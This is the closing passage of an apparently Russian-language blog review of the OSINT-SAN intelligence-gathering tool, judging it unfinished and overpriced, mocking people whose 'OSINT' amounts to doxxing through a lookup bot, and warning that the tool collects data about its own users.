Бот телеграм. Ну здесь всё по стандарту, ничего нового.

Итоги и ответ на вопрос: "ну так и че такое OSINT??"

Покончив с обзором OSINT-SAN, хочу сказать следующее - продукт сырой, ждать доработки ещё придется N количество времени. Благо Максим Викторович нашёл программиста, так что надеюсь дело сдвинется с мертвой точки. Пока своих денег продукт не стоит, по функционалу и количеству багов. Моё субъективное мнение.

Для чего данный пост был написан? А для того, чтобы заострить ваше внимание на одной простой истине. Если ваш OSINT сводится к тупому тыканью в глазе бога и радостным крикам: "хы-хы-хы задоксил" - то хуевый с вас OSINT специалист. Лично я не могу относиться серьезно к тем, кто не умея банально автоматизировать сбор информации из баз данных и открытых источников обучает чему-то людей за большие деньги, берет в работу расследования инцидентов у коммерции или боже упаси, у физических лиц. Ну нет у вас квалификации должного уровня, хоть убей. Глаз бога умрет и вместе с ним умрут тысячи "крутых" осинтеров СНГ. Только через личный труд, постижение программирования, логики, автоматизации и агрегации инструментария растёт уровень компетенций OSINT специалиста. И именно как не асынтера, доксера, сватера и прочей чепухи, а как серьезного, с высокоразвитым критическим мышлением аналитика - военного, коммерческого, да и любого другого фронта.

Рекомендую скачать бесплатную версию OSINT-SAN и самостоятельно потыкаться в нем. Людям со знанием python должно качнуть проф. навыки.

Кстати ВАЖНО - OSINT-SAN собирает инфу о своих клиентах. Так что учитывайте это при работе с этим и любыми другими ботами/приложениями/веб-сервисами.

Благодарю за прочтение статьи.